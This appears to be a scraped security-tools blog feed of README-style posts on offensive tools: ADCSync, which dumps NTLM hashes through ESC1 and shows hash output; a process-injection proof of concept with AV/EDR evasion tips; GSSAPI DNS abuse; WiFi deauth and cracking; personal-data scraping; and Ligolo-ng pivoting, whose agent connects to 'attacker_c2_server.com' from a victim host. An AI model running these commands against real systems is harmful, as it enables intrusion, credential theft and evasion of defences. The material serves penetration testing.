FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.

All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.

Also there might be some overlap with for instance the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the one from MDE. This is assuming you have MDE and Sentinel connected and most machines are onboarded into MDE.

Sharphound / Azurehound

While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to compliment the collection and remove the moment-in-time problem of the peroiodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.

It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.

License

This project is licensed under the BSD3 License - see the LICENSE file for details.

This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.



ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes

By: Zion3R
19 January 2024 at 11:30


This is a tool I whipped up together quickly to DCSync utilizing ESC1. It is quite slow but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.


This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.

python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/

Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00, 1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LO CAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

Introduction

ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.

Installation

git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt

Usage

To use this tool we need the following things:

  1. Valid Domain Credentials
  2. A user list from a bloodhound dump that will be passed in.
  3. A template vulnerable to ESC1 (Found with Certipy find)
# python3 adcsync.py --help
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/

Usage: adcsync.py [OPTIONS]

Options:
-f, --file TEXT Input User List JSON file from Bloodhound [required]
-o, --output TEXT NTLM Hash Output file [required]
-ca TEXT Certificate Authority [required]
-dc-ip TEXT IP Address of Domain Controller [required]
-u, --user TEXT Username [required]
-p, --password TEXT Password [required]
-template TEXT Template Name vulnerable to ESC1 [required]
-target-ip TEXT IP Address of th e target machine [required]
--help Show this message and exit.

TODO

  • Support alternative authentication methods such as NTLM hashes and ccache files
  • Automatically run "certipy find" to find and grab templates vulnerable to ESC1
  • Add jitter and sleep options to avoid detection
  • Add type validation for all variables

Acknowledgements

  • puzzlepeaches: Telling me to hurry up and write this
  • ly4k: For Certipy
  • WazeHell: For the script to set up the vulnerable AD environment used for testing


Gssapi-Abuse - A Tool For Enumerating Potential Hosts That Are Open To GSSAPI Abuse Within Active Directory Networks

By: Zion3R
20 January 2024 at 11:30


gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here: A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks

The tool has two features. The first is the ability to enumerate non Windows hosts that are joined to Active Directory that offer GSSAPI authentication over SSH.

The second feature is the ability to perform dynamic DNS updates for GSSAPI abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.


Prerequisites

gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.

Windows

On Windows hosts, the MIT Kerberos software should be installed in addition to the python modules listed in requirements.txt, this can be obtained at the MIT Kerberos Distribution Page. Windows krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf

Linux

The libkrb5-dev package needs to be installed prior to installing python requirements

All

Once the requirements are satisfied, you can install the python dependencies via pip/pip3 tool

pip install -r requirements.txt

Enumeration Mode

The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.

Once the list of non Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI based authentication is permitted.

Example

python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
[=] Found 2 non Windows machines registered within AD
[!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
[+] Host centos.ad.ginge.com has GSSAPI enabled over SSH

DNS Mode

DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently dns mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targetting a specific domain controller, e.g. DNS/dc1.victim.local.

Examples

Adding a DNS A record for host ahost.ad.ginge.com

python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding A record for target ahost using data 192.168.128.50
[+] Applied 1 updates successfully

Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a ., this is important or the record becomes a relative record to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones to A records.

python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
[+] Applied 1 updates successfully

Forward and reverse DNS lookup results after execution

nslookup ahost.ad.ginge.com
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1

Name: ahost.ad.ginge.com
Address: 192.168.128.50
nslookup 192.168.128.50
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1

Name: ahost.ad.ginge.com
Address: 192.168.128.50


DllNotificationInjection - A POC Of A New "Threadless" Process Injection Technique That Works By Utilizing The Concept Of DLL Notification Callbacks In Local And Remote Processes

By: Zion3R
21 January 2024 at 11:30

DllNotificationInection is a POC of a new “threadless” process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.

An accompanying blog post with more details is available here:

https://shorsec.io/blog/dll-notification-injection/


How It Works?

DllNotificationInection works by creating a new LDR_DLL_NOTIFICATION_ENTRY in the remote process. It inserts it manually into the remote LdrpDllNotificationList by patching of the List.Flink of the list head and the List.Blink of the first entry (now second) of the list.

Our new LDR_DLL_NOTIFICATION_ENTRY will point to a custom trampoline shellcode (built with @C5pider's ShellcodeTemplate project) that will restore our changes and execute a malicious shellcode in a new thread using TpWorkCallback.

After manually registering our new entry in the remote process we just need to wait for the remote process to trigger our DLL Notification Callback by loading or unloading some DLL. This obviously doesn't happen in every process regularly so prior work finding suitable candidates for this injection technique is needed. From my brief searching, it seems that RuntimeBroker.exe and explorer.exe are suitable candidates for this, although I encourage you to find others as well.

OPSEC Notes

This is a POC. In order for this to be OPSEC safe and evade AV/EDR products, some modifications are needed. For example, I used RWX when allocating memory for the shellcodes - don't be lazy (like me) and change those. One also might want to replace OpenProcess, ReadProcessMemory and WriteProcessMemory with some lower level APIs and use Indirect Syscalls or (shameless plug) HWSyscalls. Maybe encrypt the shellcodes or even go the extra mile and modify the trampoline shellcode to suit your needs, or at least change the default hash values in @C5pider's ShellcodeTemplate project which was utilized to create the trampoline shellcode.

Acknowledgments



Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

By: Zion3R
22 January 2024 at 11:30


Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.


Extracted Details:

Uscrapper extracts the following details from the provided website:

  • Email Addresses: Displays email addresses found on the website.
  • Social Media Links: Displays links to various social media platforms found on the website.
  • Author Names: Displays the names of authors associated with the website.
  • Geolocations: Displays geolocation information associated with the website.
  • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website including email addresses phone numbers and usernames.

Whats New?:

Uscrapper 2.0:

  • Introduced multiple modules to bypass anti-webscrapping techniques.
  • Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
  • Implemented Multithreading to make these processes faster.

Installation Steps:

git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/ 
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

Usage:

To run Uscrapper, use the following command-line syntax:

python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


Arguments:

  • -h, --help: Show the help message and exit.
  • -u URL, --url URL: Specify the URL of the website to extract details from.
  • -c INT, --crawl INT: Specify the number of links to crawl
  • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
  • -O, --generate-report: Generate a report file containing the extracted details.
  • -ns, --nonstrict: Display non-strict usernames during extraction.

Note:

  • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

  • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

  • To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.

Contribution:

Want a new feature to be added?

  • Make a pull request with all the necessary details and it will be merged after a review.
  • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


Rayder - A Lightweight Tool For Orchestrating And Organizing Your Bug Hunting Recon / Pentesting Command-Line Workflows

By: Zion3R
23 January 2024 at 11:30


Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them parallelly if the commands do not depend on each other.


Installation

To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:

go install github.com/devanshbatham/[email protected]

Usage

Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:

rayder -w path/to/workflow.yaml

Workflow Configuration

A workflow is defined in a YAML file with the following structure:

vars:
VAR_NAME: value
# Add more variables...

parallel: true|false
modules:
- name: task-name
cmds:
- command-1
- command-2
# Add more commands...
silent: true|false
# Add more modules...

Using Variables in Workflows

Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).

Defining Variables

To define variables, add them to the vars section of your workflow YAML file:

vars:
VAR_NAME: value
ANOTHER_VAR: another_value
# Add more variables...

Referencing Variables in Commands

You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:

modules:
- name: example-task
cmds:
- echo "Output directory {{OUTPUT_DIR}}"

Supplying Variables via the Command Line

You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:

rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value

If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.

Remember that variables supplied via the command line will override the default values defined in the YAML configuration.

Example

Example 1:

Here's an example of how you can define, reference, and supply variables in your workflow configuration:

vars:
ORG: "example.org"
OUTPUT_DIR: "results"

modules:
- name: example-task
cmds:
- echo "Organization {{ORG}}"
- echo "Output directory {{OUTPUT_DIR}}"

When executing the workflow, you can provide values for ORG and OUTPUT_DIR via the command line like this:

rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir

This will override the default values and use the provided values for these variables.

Example 2:

Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:

vars:
ORG: "Acme, Inc"
OUTPUT_DIR: "results-dir"

parallel: false
modules:
- name: reverse-whois
silent: false
cmds:
- mkdir -p {{OUTPUT_DIR}}
- revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt

- name: finding-subdomains
cmds:
- xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
silent: false

- name: cleaning-subdomains
cmds:
- cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
- rm *.out
silent: true

- name: resolving-subdomains
cmds:
- cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
silent: false

- name: checking-alive-subdomains
cmds:
- cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 0 -o {{OUTPUT_DIR}}/alive-subdomains.txt
silent: false

To execute the above workflow, run the following command:

rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results

Parallel Execution

The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.

Workflows

Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!

Inspiration

Inspiration of this project comes from Awesome taskfile project.



Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

By: Zion3R
24 January 2024 at 11:30


Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

⭐ Don't forget to put a star if you like the project!

Legal

Airgorah is designed to be used in testing and discovering flaws in networks you are owner of. Performing attacks on WiFi networks you are not owner of is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.

Requirements

This software only works on linux and requires root privileges to run.

You will also need a wireless network card that supports monitor mode and packet injection.

Installation

The installation instructions are available here.

Usage

The documentation about the usage of the application is available here.

License

This project is released under MIT license.

Contributing

If you have any question about the usage of the application, do not hesitate to open a discussion

If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request



Antisquat - Leverages AI Techniques Such As NLP, ChatGPT And More To Empower Detection Of Typosquatting And Phishing Domains

By: Zion3R
25 January 2024 at 11:30


AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.


How to use

  • Clone the project via git clone https://github.com/redhuntlabs/antisquat.
  • Install all dependencies by typing pip install -r requirements.txt.
  • Get a ChatGPT API key at https://platform.openai.com/account/api-keys
  • Create a file named .openai-key and paste your chatgpt api key in there.
  • (Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your godaddy api key in there.
  • Create a file named ‘domains.txt’. Type in a line-separated list of domains you’d like to scan.
  • (Optional) Create a file named blacklist.txt. Type in a line-separated list of domains you’d like to ignore. Regular expressions are supported.
  • Run antisquat using python3.8 antisquat.py domains.txt

Examples:

Let’s say you’d like to run antisquat on "flipkart.com".

Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.

AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.

Test case:

A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py

Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.

If you'd like to know more about the tool, make sure to check out our blog.

Acknowledgements

To know more about our Attack Surface Management platform, check out NVADR.



Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

By: Zion3R
26 January 2024 at 11:30


Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


Features

  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with Let's Encrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

As an example, for a TCP connection:

  • SYN are translated to connect() on remote
  • SYN-ACK is sent back if connect() succeed
  • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
  • Nothing is sent if timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng

Linux

When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up

Windows

You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng » session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] » ifconfig 
[...]
┌─────────────────────────────────────────────┐
│ Interface 3 │
├──────────────┬──────────────────────────────┤
│ Name │ wlp3s0 │
│ Hardware MAC │ de:ad:be:ef:ca:fe │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast │
│ IPv4 Address │ 192.168.0.30/24 │
└──────────────┴──────────────────────────────┘

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

Linux:

$ sudo ip route add 192.168.0.0/24 dev ligolo

Windows:

> netsh int ipv4 show interfaces

Idx Mét MTU État Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo

> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

[Agent : nchatelain@nworkstation] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] » listener_list 
┌───────────────────────────────────────────────────────────────────────────────┐
│ Active listeners │
├───┬─────────────────────────┬───── ───────────────────┬────────────────────────┤
│ # │ AGENT │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────& #9508;
│ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234 │ 127.0.0.1:4321 │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘

[Agent : nchatelain@nworkstation] » listener_stop 0
INFO[1505] Listener closed.

Demo

ligolo-ng_demo.mp4

Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

Caveats

Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

When using nmap, you should use --unprivileged or -PE to avoid false positives.

Todo

  • Implement other ICMP error messages (this will speed up UDP scans) ;
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
  • Add mTLS support.

Credits

  • Nicolas Chatelain <nicolas -at- chatelain.me>


❌
❌